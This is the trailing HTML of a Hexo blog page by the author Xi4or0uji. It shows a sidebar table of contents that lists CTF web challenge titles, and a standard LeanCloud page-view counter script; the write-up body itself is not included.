              <a href="/2019/01/17/2018-11-18-2018高校运维赛wp/" rel="prev" title="2018高校运维赛wp">
                2018高校运维赛wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Xi4or0uji">
            
              <p class="site-author-name" itemprop="name">Xi4or0uji</p>
              <p class="site-description motion-element" itemprop="description">还在路上</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#where-are-you-from-level1"><span class="nav-number">1.</span> <span class="nav-text">where are you from level1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#include-me"><span class="nav-number">2.</span> <span class="nav-text">include me</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#yunpan"><span class="nav-number">3.</span> <span class="nav-text">yunpan</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#onepiece"><span class="nav-number">4.</span> <span class="nav-text">onepiece</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easy-upload"><span class="nav-number">5.</span> <span class="nav-text">easy_upload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#baby-upload"><span class="nav-number">6.</span> <span class="nav-text">baby_upload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-is-No-1"><span class="nav-number">7.</span> <span class="nav-text">php is No.1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#where-are-you-from-level2"><span class="nav-number">8.</span> <span class="nav-text">where are you from level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#classic-sqli"><span class="nav-number">9.</span> <span class="nav-text">classic sqli</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss1"><span class="nav-number">10.</span> <span class="nav-text">xss1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gallery"><span class="nav-number">11.</span> <span class="nav-text">gallery</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss2"><span class="nav-number">12.</span> <span class="nav-text">xss2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#403readfile"><span class="nav-number">13.</span> <span class="nav-text">403readfile</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#secure-html"><span class="nav-number">14.</span> <span class="nav-text">secure html</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xi4or0uji</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("kjsqHE2szT8D8zBgcoS3IuDJ-gzGzoHsz", "W2CzS27kkRW94qWAYaaWlnX7");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
